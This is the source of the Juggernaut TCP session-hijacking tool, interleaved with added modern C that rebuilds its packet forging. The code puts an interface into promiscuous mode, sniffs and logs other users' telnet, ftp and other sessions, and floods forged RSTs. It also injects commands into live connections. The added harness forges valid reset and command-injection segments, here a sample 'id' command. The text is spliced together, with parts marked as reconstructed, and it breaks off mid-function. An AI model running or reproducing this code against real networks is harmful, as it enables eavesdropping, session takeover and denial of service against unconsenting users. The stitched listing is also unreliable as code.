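/* Match as stored or with the endpoints swapped, so a FIN/RST from either side
 * closes the entry (delc() only matches the SYN's direction). */
static int matches(const struct tuple *e, const struct tuple *t)
{
    return (e->saddr == t->saddr && e->daddr == t->daddr && e->sport == t->sport && e->dport == t->dport) ||
           (e->saddr == t->daddr && e->daddr == t->saddr && e->sport == t->dport && e->dport == t->sport);
}

static int tbl_add(const struct tuple *t)
{
    int i;
    for (i = 0; i < MAXNODES; i++) if (table[i].saddr && matches(&table[i], t)) return 0;   /* duplicate */
    for (i = 0; i < MAXNODES; i++) if (!table[i].saddr) { table[i] = *t; return 1; }
    return 0;   /* table full */
}

static int tbl_del(const struct tuple *t)
{
    int i;
    for (i = 0; i < MAXNODES; i++)
        if (table[i].saddr && matches(&table[i], t)) { memset(&table[i], 0, sizeof table[i]); return 1; }
    return 0;
}

int tbl_count(void) { int i, n = 0; for (i = 0; i < MAXNODES; i++) if (table[i].saddr) n++; return n; }
void tbl_clear(void) { memset(table, 0, sizeof table); }

/* One frame in: +1 entry opened, -1 entry closed, 0 ignored. Unlike chunt(),
 * non-IPv4, non-TCP and truncated frames are rejected before any field is read. */
int hunt_frame(const uint8_t *f, size_t len)
{
    const uint8_t *ip, *tcp;
    size_t ihl;
    uint8_t flags;
    struct tuple t;

    if (len < ETHHDR + IPHDR || rd16(f + 12) != 0x0800) return 0;    /* ETH_P_IP */
    ip = f + ETHHDR;
    ihl = (size_t)(ip[0] & 0x0f) * 4;
    if ((ip[0] >> 4) != 4 || ihl < IPHDR || ip[9] != 6) return 0;    /* IPv4, IPPROTO_TCP */
    if (len < ETHHDR + ihl + TCPHDR) return 0;
    tcp = ip + ihl;
    flags = tcp[13];
    t.saddr = rd32(ip + 12); t.daddr = rd32(ip + 16);
    t.sport = rd16(tcp);     t.dport = rd16(tcp + 2);
    if ((flags & 0x02) && !(flags & 0x10)) return tbl_add(&t);       /* SYN without ACK */
    if (flags & 0x05)                      return -tbl_del(&t);      /* FIN or RST */
    return 0;
}

/* Minimal 54-byte Ethernet/IPv4/TCP frame: no options, no payload, checksums
 * left zero because the tracker never validates them. */
size_t mkframe(uint8_t *b, uint32_t s, uint32_t d, uint16_t sp, uint16_t dp, uint8_t flags)
{
    memset(b, 0, ETHHDR + IPHDR + TCPHDR);
    wr16(b + 12, 0x0800);
    b[14] = 0x45; b[22] = 64; b[23] = 6;
    wr16(b + 16, IPHDR + TCPHDR);
    wr32(b + 26, s); wr32(b + 30, d);
    wr16(b + 34, sp); wr16(b + 36, dp);
    b[46] = 5 << 4; b[47] = flags;
    return ETHHDR + IPHDR + TCPHDR;
}

/* Constructed session: 10.0.0.1 opens two telnet sessions to 10.0.0.2,
 * retransmits one SYN, then the server RSTs the first. One entry remains. */
int hunt_demo(void)
{
    uint8_t f[64];
    uint32_t c = 0x0a000001, s = 0x0a000002;
    tbl_clear();
    hunt_frame(f, mkframe(f, c, s, 1025, 23, 0x02));   /* SYN        -> opened */
    hunt_frame(f, mkframe(f, s, c, 23, 1025, 0x12));   /* SYN/ACK    -> ignored */
    hunt_frame(f, mkframe(f, c, s, 1025, 23, 0x02));   /* SYN again  -> duplicate */
    hunt_frame(f, mkframe(f, c, s, 1026, 23, 0x02));   /* second SYN -> opened */
    hunt_frame(f, mkframe(f, s, c, 23, 1025, 0x14));   /* RST/ACK    -> closes the first */
    return tbl_count();
}

int main(void)
{
    printf("eth->ip padding: %zu bytes, open connections: %d\n", eth_ip_padding(), hunt_demo());
    return 0;
}
```

The padding figure is the whole reason for the -2 in ALIGNNETPOINTERS: recv() lays the frame down contiguously from the first byte of epack, so the IP header lands two bytes before where the compiler placed epack.ip. Parsing by offset, or declaring the struct packed, removes the dependency on that ABI detail.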
<++> Juggernaut/NumberOneCrush/net.c
/*
*
* Juggernaut
* Version b1
*
* 1996/7 Guild productions
* daemon9[guild|phrack|r00t]
*
* comments to route@infonexus.com
*
* This coding project made possible by a grant from the Guild corporation
*
* net.c - network/socket control code and abstract data types
*
* In the interest of time overhead vs. code size, I created several functions
* that do much the same thing. You will notice the reset and jack code is
* quite redundant. Life is rough like that. Deal with it. Also, there are
* problems with freeing malloc'd memory.
*
*/
/* Header names were lost in transcription; reconstructed from what net.c uses
   (SOCK_PACKET/raw sockets, ioctl/ifreq, setjmp, the Linux packet headers). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <signal.h>
#include <setjmp.h>
#include <ctype.h>
#include <errno.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <net/if.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#define DEVICE "eth0"
#define ETHHDR 14
#define PHDR 12
#define TCPHDR 20
#define IPHDR 20
#define BUFSIZE 512
#define MINIBUF 10
#define RSTS 10 /* Number of RSTs to send when RSTing a connection */
#define JCKRST 3 /* You may wish to experiment with this value. The
smaller it is, the less time your command has to
complete on the target. However, the ACK storm
will also be much shorter... */
#define SNIFLOG "./juggernaut.log.snif"
struct iphdr *iphp; /* Pointer into current packets IP header */
struct tcphdr *tcphp; /* Pointer into current packets TCP header */
struct ethhdr *ethhp; /* Pointer into current packets ethernet header */
/* Macro to align the pointers into the ethernet, IP, and TCP headers.
recv() fills epack contiguously from its first byte, but the compiler
pads the 14-byte ethhdr so that epack.ip starts at offset 16. The IP
header as read off the wire therefore sits 2 bytes before epack.ip,
and the TCP header 2 bytes before epack.tcp; hence the -2. */
#define ALIGNNETPOINTERS(){\
ethhp=(struct ethhdr *)(((unsigned long)&epack.eth));\
iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);\
tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);\
}
struct epack{ /* Generic Ethernet packet w/o data payload */
struct ethhdr eth; /* Ethernet Header */
struct iphdr ip; /* IP header */
struct tcphdr tcp; /* TCP header */
char payload[8192]; /* Data Payload */
}epack;
struct connectionInfo{
unsigned long saddr; /* Source IP */
unsigned long daddr; /* Destination IP */
unsigned short sport; /* Source TCP Port */
unsigned short dport; /* Destination TCP Port */
};
jmp_buf env; /* To preserve our environment */
extern int verbosity; /* Should we dump error messages? */
/*
* Creates a low level raw-packet socket and puts the device into promiscuous
* mode.
*/
int tap(device)
char *device;
{
int fd;
struct ifreq ifr; /* Link-layer interface request structure */
/* Ethernet code for IP 0x800==ETH_P_IP */
if((fd=socket(AF_INET,SOCK_PACKET,htons(ETH_P_IP)))<0){
if(verbosity)perror("(tap) SOCK_PACKET allocation problems [fatal]");
exit(1);
}
strcpy(ifr.ifr_name,device);
if((ioctl(fd,SIOCGIFFLAGS,&ifr))<0){ /* Get the device info */
if(verbosity)perror("(tap) Can't get device flags [fatal]");
close(fd);
exit(1);
}
ifr.ifr_flags|=IFF_PROMISC; /* Set promiscuous mode */
if((ioctl(fd,SIOCSIFFLAGS,&ifr))<0){ /* Set flags */
if(verbosity)perror("(tap) Can't set promiscuous mode [fatal]");
close(fd);
exit(1);
}
return(fd);
}
/*
* Gimme a raw-IP socket. Use of IP_HDRINCL is automatic with 2.0.x
* kernels. Not sure about 1.2.x
*/
int rawsock(){
int fd,val=1;
if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
if(verbosity)perror("\n(rawsock) Socket problems [fatal]");
exit(1);
}
#ifdef IP_HDRINCL
if(setsockopt(fd,IPPROTO_IP,IP_HDRINCL,&val,sizeof(val))<0){
if(verbosity){
perror("Cannot set IP_HDRINCL socket option");
fprintf(stderr,"\nIf you are relying on this rather than a hacked kernel to spoof packets, you're sunk.\n[cr]");
getchar();
}
}
#endif
return(fd);
}
/*
 * Hunter. At this point, only cares about connection information (infant
 * connections and tear-downs). I should have it pass SEQ and ACK related
 * info to the relevant functions... This function will be forked to the
 * background as a separate process, and in future versions it will be
 * implemented as a separate thread of execution.
 */
void chunt(){
void add(struct iphdr *,struct tcphdr *,struct ethhdr *);
void del(struct iphdr *,struct tcphdr *);
extern int linksock; /* raw packet socket */
ALIGNNETPOINTERS();
/* No alarm timeout here. We block forever until packets zing by */
while(1)if(recv(linksock,&epack,sizeof(epack),0)){
if(iphp->protocol==IPPROTO_TCP&&(tcphp->syn&&!tcphp->ack))add(iphp,tcphp,ethhp);
if(iphp->protocol==IPPROTO_TCP&&(tcphp->rst||tcphp->fin))del(iphp,tcphp);
}
}
/*
* addc() wrapper. Checks to make sure we want to add this connection to
* our list.... At this point, we'll take ftp control, ssh (well, we can
* RST them) telnet, smtp, http, rlogin, and irc.
*/
void add(iphp,tcphp,ethhp)
struct iphdr *iphp;
struct tcphdr *tcphp;
struct ethhdr *ethhp; /* Future Use */
{
char *addc(struct iphdr *, struct tcphdr *);
char *msg;
#ifdef GREED
if((msg=addc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
#ifdef NOHUSH
fprintf(stderr,"%c",7);
#endif
return;
#else
switch(ntohs(tcphp->dest)){
case 21:
case 22:
case 23:
case 25:
case 80:
case 513:
case 6667:
if((msg=addc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
#ifdef NOHUSH
fprintf(stderr,"%c",7);
#endif
return;
default:
return;
}
#endif
}
/*
* delc() wrapper. Checks connection port number to see if we should even
* bother passing to the delete function which will do a potentially expensive
* linear search...
*/
void del(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
char *delc(struct iphdr *, struct tcphdr *);
char *msg;
#ifdef GREED
if((msg=delc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
return;
#else
switch(ntohs(tcphp->dest)){
case 21:
case 22:
case 23:
case 25:
case 80:
case 513:
case 6667:
if((msg=delc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
return;
default:
return;
}
#endif
}
/*
* Spy on a connection. If the packet captured is from the target connection,
* call dumpp(). If fp is valid, prepend header/append footer.
*/
void cspy(target,fp)
struct connectionInfo *target;
FILE *fp;
{
char *hostLookup(unsigned long);
void dumpp(char *,int,FILE *);
extern int sigsentry;
int tlinksock=tap(DEVICE); /* Spying tap. XXX- Really dumb way to do this... */
time_t tp;
ALIGNNETPOINTERS();
fprintf(stderr,"Spying on connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport));
if(fp){
fprintf(fp,"---------------------------------------------------------------------\n: Juggernaut connection spy log header\n: %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup(target->daddr),ntohs(target->dport));
time(&tp);
fprintf(fp,": Log started:\t\t%s---------------------------------------------------------------------\n",ctime(&tp));
}
/* NO alarm timeout here. SIGINT kills our spy session */
while(sigsentry)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP)if(iphp->saddr==target->daddr&&tcphp->source==target->dport)dumpp(epack.payload-2,htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp),fp);
if(fp){
fprintf(fp,"\n---------------------------------------------------------------------\n: Juggernaut connection spy log trailer\n: %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup(target->daddr),ntohs(target->dport)
);
time(&tp);
fprintf(fp,": Log ended:\t\t%s---------------------------------------------------------------------\n",ctime(&tp));
}
close(tlinksock);
}
/*
* Dumps the payload. Dump to file if we have a valid FP.
*/
void dumpp(payload,length,fp)
char *payload;
int length;
FILE *fp;
{
register int tickytacky=0;
/* The loop body was lost in extraction and is reconstructed here: echo
   each payload byte to stderr and, when a log file is open, to it as well. */
for(;tickytacky<length;tickytacky++){
fputc(payload[tickytacky],stderr);
if(fp)fputc(payload[tickytacky],fp);
}
if(fp)fflush(fp);
}
/*
 * Reset a connection. Waits for a packet from the client side of the
 * target connection, then fires RSTS resets at the client in the server's
 * name, stepping the sequence number so one of them lands in the window.
 * [The opening of this function, down to the sin.sin_port assignment, was
 * lost in extraction and is reconstructed from acrst() and csimplexhijack().]
 */
void crst(target)
struct connectionInfo *target;
{
void nettimeout();
char *hostLookup(unsigned long);
unsigned short in_cksum(unsigned short *,int);
struct tpack{ /* Generic TCP packet w/o data */
struct iphdr ip;
struct tcphdr tcp;
}tpack;
struct psuedoHeader{
unsigned long saddr;
unsigned long daddr;
unsigned char null;
unsigned char prot;
unsigned short tlen;
}*ppheader;
struct sockaddr_in sin;
int moot=0;
extern int ripsock;
extern int netreadtimeout;
char *tempBuf=0;
int tlinksock=tap(DEVICE);
ALIGNNETPOINTERS();
sin.sin_family=AF_INET;
sin.sin_port=target->dport;
sin.sin_addr.s_addr=target->saddr;
bzero(&tpack,sizeof(tpack)); /* Zero out these structures so I don't
have to assign 0's to the unused
areas... */
bzero(&ppheader,sizeof(ppheader));
tpack.tcp.source=target->dport; /* 16-bit Source port number */
tpack.tcp.dest=target->sport; /* 16-bit Destination port */
tpack.tcp.doff=5; /* Data offset */
tpack.tcp.ack=1; /* Acknowledgement field valid flag */
tpack.tcp.rst=1; /* Reset flag */
tpack.tcp.window=htons(242); /* 16-bit Window size */
tpack.ip.version=4; /* 4-bit Version */
tpack.ip.ihl=5; /* 4-bit Header Length */
tpack.ip.tot_len=htons(IPHDR+TCPHDR); /* 16-bit Total length */
tpack.ip.ttl=64; /* 8-bit Time To Live */
tpack.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */
tpack.ip.saddr=target->daddr; /* 32-bit Source Address */
tpack.ip.daddr=target->saddr; /* 32-bit Destination Address */
tempBuf=(char *)malloc(PHDR+TCPHDR); /* Checksum stuff */
ppheader=(struct psuedoHeader *)tempBuf;
ppheader->saddr=tpack.ip.saddr;
ppheader->daddr=tpack.ip.daddr;
ppheader->prot=IPPROTO_TCP;
ppheader->null=0;
ppheader->tlen=htons(TCPHDR);
fprintf(stderr,"Resetting connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport));
if(setjmp(env)){ /* Timeout */
if(verbosity)fprintf(stderr,"Quiet connection, not reset. [soft error, returning]\n");
return;
}
signal(SIGALRM,nettimeout);
alarm(netreadtimeout); /* Wait 10 seconds for reply */
while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->saddr&&tcphp->source==target->sport){
for(;moot<RSTS;moot++){ /* RSTS resets, stepping the sequence number */
/* Both values are in network byte order, so adding htonl(moot) nudges
   the low-order byte without carry; kept as the original does it. */
tpack.tcp.seq=tcphp->ack_seq+(htonl(moot));
tpack.tcp.ack_seq=tcphp->seq+(htonl(moot));
tpack.tcp.check=0; /* Checksum field must be zero while it is computed */
bcopy(&tpack.tcp,tempBuf+PHDR,TCPHDR); /* TCP header only; tempBuf is PHDR+TCPHDR bytes */
tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR);
sendto(ripsock,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
}
alarm(0);
/*free(tempBuf); XXX */
fprintf(stderr,"Connection torn down.\n");
close(tlinksock);
break;
}
}
/*
 * Sets up automated connection resetting. A source and possibly a
 * destination host are targeted for resetting. This function will kill any
 * connection attempts from the source (and possibly to a destination).
 */
void acrst(source,target)
unsigned long source, target;
{
char *hostLookup(unsigned long);
unsigned short in_cksum(unsigned short *,int);
void spasm(); /* Handles the user defined signal */
struct tpack{
struct iphdr ip;
struct tcphdr tcp;
}tpack;
struct psuedoHeader{
unsigned long saddr;
unsigned long daddr;
unsigned char null;
unsigned char prot;
unsigned short tlen;
}*ppheader;
struct sockaddr_in sin;
int moot=0;
extern int ripsock;
extern int acrstpid;
char *tempBuf=0;
int tlinksock=tap(DEVICE);
switch((acrstpid=fork())){ /* Drop a child to the background, return the
parent to continue */
case 0: /* Set the priority up a few notches..
I get better results */
if(setpriority(PRIO_PROCESS,0,-20)){
if(verbosity)perror("acrst module (setpriority)");
fprintf(stderr,"[cr]");
getchar();
}
signal(SIGUSR1,spasm); /* Keep track of the child and register
it with the cleanup signal handler */
signal(SIGINT,SIG_IGN);
signal(SIGQUIT,SIG_IGN);
break;
default:
return;
case -1:
if(verbosity)perror("acrst module Internal forking error [fatal]");
exit(1);
}
ALIGNNETPOINTERS();
/* Preload these values. */
sin.sin_family=AF_INET;
bzero(&tpack,sizeof(tpack));
bzero(&ppheader,sizeof(ppheader));
tpack.tcp.doff=5;
tpack.tcp.ack=1;
tpack.tcp.rst=1;
tpack.tcp.window=htons(242);
tpack.ip.version=4;
tpack.ip.ihl=5;
tpack.ip.tot_len=htons(IPHDR+TCPHDR);
tpack.ip.ttl=64;
tpack.ip.protocol=IPPROTO_TCP;
tempBuf=(char *)malloc(PHDR+TCPHDR);
ppheader=(struct psuedoHeader *)tempBuf;
ppheader->null=0;
ppheader->prot=IPPROTO_TCP;
ppheader->tlen=htons(TCPHDR);
while(1){
if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&tcphp->syn&&iphp->saddr==source){
if(target)if(iphp->daddr!=target)continue;
sin.sin_port=tcphp->dest;
sin.sin_addr.s_addr=iphp->saddr;
tpack.tcp.source=tcphp->dest;
tpack.tcp.dest=tcphp->source;
for(moot=1;moot<RSTS;moot++){ /* RSTS resets per SYN, stepping the sequence number */
tpack.tcp.seq=tcphp->seq+(htonl(moot));
/* ack_seq is left at zero. A stack that follows RFC 793 in SYN-SENT only
   honours a RST whose ACK number is acceptable, so this relies on the
   target's TCP being lenient. */
tpack.tcp.check=0;
tpack.ip.saddr=iphp->daddr;
tpack.ip.daddr=iphp->saddr;
tpack.ip.check=0;
ppheader->saddr=tpack.ip.saddr;
ppheader->daddr=tpack.ip.daddr;
bcopy(&tpack.tcp,tempBuf+PHDR,TCPHDR); /* TCP header only; tempBuf is PHDR+TCPHDR bytes */
tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR);
sendto(ripsock,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
fprintf(stderr,"%c-%c*",0x08,0x08);
}
}
}
}
/*
* Simplex-hijack. Really just inserts a command into the TCP stream. This
* will totally desynch the connection however and cause two things to happen:
* 1) an ACK storm of epic proportions (maybe not, see accompanying paper) and
* 2) the target user will have her connection destroyed. To alleviate the
* first problem, we simply reset the connection shortly after we hijack it.
* The second problem is a burden with this kind of hijacking.
*/
void csimplexhijack(target,commandbuf)
struct connectionInfo *target;
char *commandbuf;
{
void nettimeout();
char *hostLookup(unsigned long);
unsigned short in_cksum(unsigned short *,int);
struct tpack{ /* Generic TCP packet */
struct iphdr ip;
struct tcphdr tcp;
char payload[BUFSIZE];
}tpack;
struct psuedoHeader{
unsigned long saddr;
unsigned long daddr;
unsigned char null;
unsigned char prot;
unsigned short tlen;
}*ppheader;
struct sockaddr_in sin;
extern int ripsock;
extern int netreadtimeout;
static int len;
char *tempBuf;
int tlinksock=tap(DEVICE);
ALIGNNETPOINTERS();
bzero(&tpack,sizeof(tpack));
len=strlen(commandbuf)+1;
if(len>BUFSIZE)len=BUFSIZE; /* payload[] is BUFSIZE bytes; truncate rather than overflow */
bcopy(commandbuf,tpack.payload,len--);
sin.sin_family=AF_INET;
sin.sin_port=target->sport;
sin.sin_addr.s_addr=target->daddr;
tpack.tcp.source=target->sport;
tpack.tcp.dest=target->dport;
tpack.tcp.doff=5;
tpack.tcp.ack=1;
tpack.tcp.psh=1;
tpack.tcp.window=htons(242);
tpack.ip.version=4;
tpack.ip.ihl=5;
tpack.ip.tot_len=htons(IPHDR+TCPHDR+len);
tpack.ip.ttl=64;
tpack.ip.protocol=IPPROTO_TCP;
tpack.ip.saddr=target->saddr;
tpack.ip.daddr=target->daddr;
tempBuf=(char *)malloc(PHDR+TCPHDR+len); /* Check me out y0 */
ppheader=(struct psuedoHeader *)tempBuf;
ppheader->saddr=tpack.ip.saddr;
ppheader->daddr=tpack.ip.daddr;
ppheader->null=0;
ppheader->prot=IPPROTO_TCP;
ppheader->tlen=htons(TCPHDR+len);
fprintf(stderr,"(simplex) Hijacking connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport));
if(setjmp(env)){ /* Timeout */
if(verbosity)fprintf(stderr,"Quiet connection, try again later. [soft error, returning]\n");
return;
}
signal(SIGALRM,nettimeout);
alarm(0);
alarm(netreadtimeout); /* Wait 10 seconds for reply */
while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){
tpack.tcp.seq=tcphp->ack_seq;
tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1);
bcopy(&tpack.tcp,tempBuf+PHDR,TCPHDR+len); /* header + data only; tempBuf holds PHDR+TCPHDR+len bytes */
tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len);
sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin));
fprintf(stderr,"Command inserted, connection desynched.\n");
sleep(JCKRST); /* Don't reset the connection too quickly, or
our command may not complete */
crst(target);
close(tlinksock);
/* free(tempBuf); XXX */
break;
}
}
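The reset and injection packets that crst(), acrst() and csimplexhijack() build all lean on two things that the listing leaves implicit: in_cksum(), which lives in another module of the package and is not in this excerpt, and the SEQ/ACK arithmetic that csimplexhijack() does with htonl(ntohl(tcphp->seq)+1). What follows is an added example, not Juggernaut code and not from its author: it assembles the same IP+TCP segments into a plain byte buffer with the pseudo-header checksum written out, derives the forged SEQ/ACK from an observed server segment (counting the observed data length instead of assuming one byte), and checks the result the way a receiving stack would. The addresses, ports and sample segment are constructed, and forge_segment(), forge_reply() and segment_valid() are names chosen here; the headers are built by hand so the code compiles without the Linux-specific includes the page uses. It also serves as a reference for the transport checksums that ripa() in prometheus.c computes later in this issue.

```c
/*
 * Added example (not Juggernaut code): forge an IPv4+TCP segment in a byte
 * buffer with RFC 1071 checksums, the way crst()/csimplexhijack() do through
 * in_cksum() and their pseudo-header buffer. Everything here is constructed.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define IPHDR   20
#define TCPHDR  20
#define PHDR    12                      /* TCP pseudo-header length */
#define TH_FIN  0x01
#define TH_SYN  0x02
#define TH_RST  0x04
#define TH_PSH  0x08
#define TH_ACK  0x10

static void put16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xff; }
static void put32(uint8_t *p, uint32_t v) { put16(p, v >> 16); put16(p + 2, v & 0xffff); }
static uint16_t get16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t get32(const uint8_t *p) { return ((uint32_t)get16(p) << 16) | get16(p + 2); }

/* RFC 1071: 16-bit ones'-complement sum, complemented. Run over bytes that
   already carry their own correct checksum it returns 0. */
uint16_t in_cksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    while (len > 1) { sum += (uint32_t)(data[0] << 8 | data[1]); data += 2; len -= 2; }
    if (len) sum += (uint32_t)data[0] << 8;           /* odd trailing byte, zero padded */
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* TCP checksum: pseudo-header (src, dst, zero, protocol 6, TCP length)
   followed by header+data. This is what tempBuf/ppheader hold on the page. */
uint16_t tcp_cksum(uint32_t saddr, uint32_t daddr, const uint8_t *tcp, size_t tcplen)
{
    uint8_t buf[PHDR + 1500];
    if (tcplen > sizeof buf - PHDR) return 0;
    put32(buf, saddr); put32(buf + 4, daddr);
    buf[8] = 0; buf[9] = 6; put16(buf + 10, (uint16_t)tcplen);
    memcpy(buf + PHDR, tcp, tcplen);
    return in_cksum(buf, PHDR + tcplen);
}

/* Assemble IPv4 + TCP into out (must hold IPHDR+TCPHDR+plen bytes). Returns bytes written. */
size_t forge_segment(uint8_t *out, uint32_t saddr, uint32_t daddr,
                     uint16_t sport, uint16_t dport, uint32_t seq, uint32_t ack,
                     uint8_t flags, const uint8_t *payload, size_t plen)
{
    size_t tot = IPHDR + TCPHDR + plen;
    uint8_t *tcp = out + IPHDR;
    memset(out, 0, tot);
    out[0] = 0x45;                          /* version 4, IHL 5 (no options) */
    put16(out + 2, (uint16_t)tot);          /* total length */
    out[8] = 64;                            /* TTL, as the page uses */
    out[9] = 6;                             /* IPPROTO_TCP */
    put32(out + 12, saddr); put32(out + 16, daddr);
    put16(out + 10, in_cksum(out, IPHDR));  /* header checksum, field zero while summing */
    put16(tcp, sport); put16(tcp + 2, dport);
    put32(tcp + 4, seq); put32(tcp + 8, ack);
    tcp[12] = 5 << 4;                       /* data offset: 5 words */
    tcp[13] = flags;
    put16(tcp + 14, 242);                   /* the page's window of 242 */
    if (plen) memcpy(tcp + TCPHDR, payload, plen);
    put16(tcp + 16, tcp_cksum(saddr, daddr, tcp, TCPHDR + plen));
    return tot;
}

/* What the hijack modules read off a sniffed server->client segment. */
struct observed { uint32_t saddr, daddr; uint16_t sport, dport; uint32_t seq, ack; uint16_t datalen; uint8_t flags; };

/* Forge a segment in the client's name from that observation: forged SEQ is the
   server's ACK (next byte it expects), forged ACK is the server's SEQ plus what it
   sent (SYN and FIN each consume one). The page hard-codes +1, which is only right
   when the observed segment carried exactly one byte of data. */
size_t forge_reply(uint8_t *out, const struct observed *o, uint8_t flags, const uint8_t *payload, size_t plen)
{
    uint32_t consumed = o->datalen + ((o->flags & TH_SYN) ? 1 : 0) + ((o->flags & TH_FIN) ? 1 : 0);
    return forge_segment(out, o->daddr, o->saddr, o->dport, o->sport,
                         o->ack, o->seq + consumed, flags, payload, plen);
}

/* Receiver-side check: both checksums verify iff in_cksum over the covered bytes is 0. */
int segment_valid(const uint8_t *pkt, size_t len)
{
    if (len < IPHDR + TCPHDR || len - IPHDR > 1500 || pkt[0] != 0x45 || pkt[9] != 6) return 0;
    if (get16(pkt + 2) != len) return 0;
    if (in_cksum(pkt, IPHDR) != 0) return 0;
    return tcp_cksum(get32(pkt + 12), get32(pkt + 16), pkt + IPHDR, len - IPHDR) == 0;
}

/* Constructed sample: server 10.0.0.2:23 sends 3 bytes to client 10.0.0.1:1234. */
static const struct observed sample = { 0x0a000002, 0x0a000001, 23, 1234, 5000, 1000, 3, TH_ACK | TH_PSH };

int demo_rst_valid(void)        /* what crst() sends: RST|ACK, no data */
{
    uint8_t pkt[64];
    size_t n = forge_reply(pkt, &sample, TH_RST | TH_ACK, NULL, 0);
    return n == 40 && segment_valid(pkt, n) && get32(pkt + 24) == 1000 && get32(pkt + 28) == 5003;
}

int demo_inject_valid(void)     /* what csimplexhijack() sends: PSH|ACK carrying a command */
{
    uint8_t pkt[128];
    const uint8_t cmd[] = "id\n";
    size_t n = forge_reply(pkt, &sample, TH_PSH | TH_ACK, cmd, 3);
    return n == 43 && segment_valid(pkt, n) && memcmp(pkt + 40, cmd, 3) == 0;
}

int demo_tamper_detected(void)  /* flipping one flag bit breaks the TCP checksum */
{
    uint8_t pkt[64];
    size_t n = forge_reply(pkt, &sample, TH_RST | TH_ACK, NULL, 0);
    pkt[33] ^= TH_RST;
    return segment_valid(pkt, n) == 0;
}

int main(void)
{
    uint8_t pkt[64];
    size_t n = forge_reply(pkt, &sample, TH_RST | TH_ACK, NULL, 0), i;
    for (i = 0; i < n; i++) printf("%02x%s", pkt[i], (i % 16 == 15) ? "\n" : " ");
    printf("\nrst valid=%d inject valid=%d tamper detected=%d\n",
           demo_rst_valid(), demo_inject_valid(), demo_tamper_detected());
    return 0;
}
```

Sending the buffer is the one step left out: on the page that is the sendto() on ripsock with IP_HDRINCL, and nothing in this example opens a socket.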
/*
* Hijack. Desynchs the server from the client. The resulting ACK storm
* makes things very difficult.
*/
void chijack(target)
struct connectionInfo *target;
{
void nettimeout();
void seizure();
char *hostLookup(unsigned long);
unsigned short in_cksum(unsigned short *,int);
struct tpack{
struct iphdr ip;
struct tcphdr tcp;
char payload[2*BUFSIZE];
}tpack;
struct psuedoHeader{
unsigned long saddr;
unsigned long daddr;
unsigned char null;
unsigned char prot;
unsigned short tlen;
}*ppheader;
struct sockaddr_in sin;
char buf[10*MINIBUF];
char *tempBuf=0;
extern int ripsock;
extern int netreadtimeout;
extern int sigsentry;
static int len;
int tlinksock=tap(DEVICE);
ALIGNNETPOINTERS();
bzero(&tpack,sizeof(tpack));
sin.sin_family=AF_INET;
sin.sin_port=target->sport;
sin.sin_addr.s_addr=target->daddr;
tpack.tcp.source=target->sport;
tpack.tcp.dest=target->dport;
tpack.tcp.doff=5;
tpack.tcp.ack=1;
tpack.tcp.psh=1;
tpack.tcp.window=htons(1024);
tpack.ip.version=4;
tpack.ip.ihl=5;
tpack.ip.ttl=64;
tpack.ip.protocol=IPPROTO_TCP;
tpack.ip.saddr=target->saddr;
tpack.ip.daddr=target->daddr;
tempBuf=(char *)malloc(PHDR+TCPHDR+sizeof(buf)); /* len is not known yet; size for the largest line fgets() can put in buf */
ppheader=(struct psuedoHeader *)tempBuf;
ppheader->saddr=tpack.ip.saddr;
ppheader->daddr=tpack.ip.daddr;
ppheader->null=0;
ppheader->prot=IPPROTO_TCP;
signal(SIGINT,seizure);
fprintf(stderr,"Hijacking connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport));
fprintf(stderr,"'ctrl-c' when you are finished (this will RST the connection).\n");
fprintf(stderr,"juggernaut>");
fgets(buf,sizeof(buf),stdin);
len=strlen(buf)+1;
bcopy(buf,tpack.payload,len--);
